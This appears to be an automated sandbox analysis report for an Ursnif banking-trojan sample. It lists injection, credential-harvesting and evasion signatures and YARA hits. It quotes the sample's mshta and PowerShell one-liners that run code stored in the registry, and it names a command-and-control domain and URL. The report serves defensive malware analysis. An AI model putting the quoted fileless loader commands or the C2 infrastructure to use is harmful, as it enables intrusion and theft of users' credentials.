Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C mov eax, dword ptr fs:[00000030h] 1_2_0493009C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930476 mov eax, dword ptr fs:[00000030h] 1_2_04930476
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC mov eax, dword ptr fs:[00000030h] 1_2_049303AC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26754260000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 24E31E50000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: AE131580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: AE131580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: CF2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 7FFFAE131580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 2FC0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 7FFFAE131580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 6968 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3292
Source: C:\Windows\explorer.exe Thread register set: target process: 3088
Source: C:\Windows\explorer.exe Thread register set: target process: 3756
Source: C:\Windows\explorer.exe Thread register set: target process: 4396
Source: C:\Windows\explorer.exe Thread register set: target process: 5804
Source: C:\Windows\explorer.exe Thread register set: target process: 6208
Source: C:\Windows\System32\control.exe Thread register set: target process: 3292
Source: C:\Windows\System32\control.exe Thread register set: target process: 7012
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7172F12E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7172F12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: CF2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFFAE131580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2FC0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: B48A8F9000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26754260000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 943186B000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 24E31E50000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000001E.00000000.433237497.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A85F3A cpuid 1_2_04A85F3A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A86204 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_04A86204
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A85F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_04A85F3A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A83C98 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_04A83C98
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 322748 Sample: vnaSKDMnLG Startdate: 25/11/2020 Architecture: WINDOWS Score: 100 83 resolver1.opendns.com 2->83 107 Found malware configuration 2->107 109 Antivirus / Scanner detection for submitted sample 2->109 111 Multi AV Scanner detection for submitted file 2->111 113 10 other signatures 2->113 10 mshta.exe 2->10         started        13 loaddll32.exe 1 2->13         started        signatures3 process4 signatures5 129 Suspicious powershell command line found 10->129 15 powershell.exe 10->15         started        19 regsvr32.exe 8 13->19         started        21 cmd.exe 1 13->21         started        process6 file7 65 C:\Users\user\AppData\...\q3xypckz.cmdline, UTF-8 15->65 dropped 67 C:\Users\user\AppData\Local\...\chv50z53.0.cs, UTF-8 15->67 dropped 91 Injects code into the Windows Explorer (explorer.exe) 15->91 93 Writes to foreign memory regions 15->93 95 Modifies the context of a thread in another process (thread injection) 15->95 105 2 other signatures 15->105 23 explorer.exe 15->23 injected 27 csc.exe 15->27         started        30 csc.exe 15->30         started        32 conhost.exe 15->32         started        97 Maps a DLL or memory area into another process 19->97 99 Writes or reads registry keys via WMI 19->99 101 Writes registry values via WMI 19->101 103 Creates a COM Internet Explorer object 19->103 34 control.exe 19->34         started        36 WerFault.exe 19->36         started        38 iexplore.exe 2 65 21->38         started        signatures8 process9 dnsIp10 85 63.250.47.200, 49771, 80 NAMECHEAP-NETUS United States 23->85 87 162.0.213.229, 443, 49776, 49778 ACPCA Canada 23->87 115 Tries to steal Mail credentials (via file access) 23->115 117 Changes memory attributes in foreign processes to executable or writable 23->117 119 Tries to harvest and steal browser information (history, passwords, etc) 23->119 127 3 other signatures 23->127 40 cmd.exe 23->40         started        55 2 other processes 23->55 61 C:\Users\user\AppData\Local\...\q3xypckz.dll, PE32 27->61 dropped 42 cvtres.exe 27->42         started        63 C:\Users\user\AppData\Local\...\chv50z53.dll, PE32 30->63 dropped 44 cvtres.exe 30->44         started        121 Writes to foreign memory regions 34->121 123 Allocates memory in foreign processes 34->123 125 Modifies the context of a thread in another process (thread injection) 34->125 46 rundll32.exe 34->46         started        89 192.168.2.1 unknown unknown 38->89 48 iexplore.exe 164 38->48         started        51 iexplore.exe 35 38->51         started        53 iexplore.exe 38->53         started        57 3 other processes 38->57 file11 signatures12 process13 dnsIp14 59 conhost.exe 40->59         started        69 img.img-taboola.com 48->69 71 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49744, 49745 YAHOO-DEBDE United Kingdom 48->71 81 9 other IPs or domains 48->81 73 assets.onestore.ms 51->73 75 consentdeliveryfd.azurefd.net 51->75 77 ajax.aspnetcdn.com 51->77 79 groovcerl.xyz 162.0.213.230, 49765, 49766, 49767 ACPCA Canada 53->79 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
87.248.118.23
 unknown United Kingdom
203220 YAHOO-DEBDE false
63.250.47.200
 unknown United States
22612 NAMECHEAP-NETUS false
162.0.213.229
 unknown Canada
35893 ACPCA false
151.101.1.44
 unknown United States
54113 FASTLYUS false
162.0.213.230
 unknown Canada
35893 ACPCA false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
contextual.media.net 104.80.21.70 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 104.80.21.70 true
lg3.media.net 104.80.21.70 true
groovcerl.xyz 162.0.213.230 true
resolver1.opendns.com 208.67.222.222 true
edge.gycpi.b.yahoodns.net 87.248.118.23 true
www.msn.com unknown unknown
srtb.msn.com unknown unknown
assets.onestore.ms unknown unknown
img.img-taboola.com unknown unknown
ajax.aspnetcdn.com unknown unknown
s.yimg.com unknown unknown
web.vortex.data.msn.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi false
  • Avira URL Cloud: safe
 unknown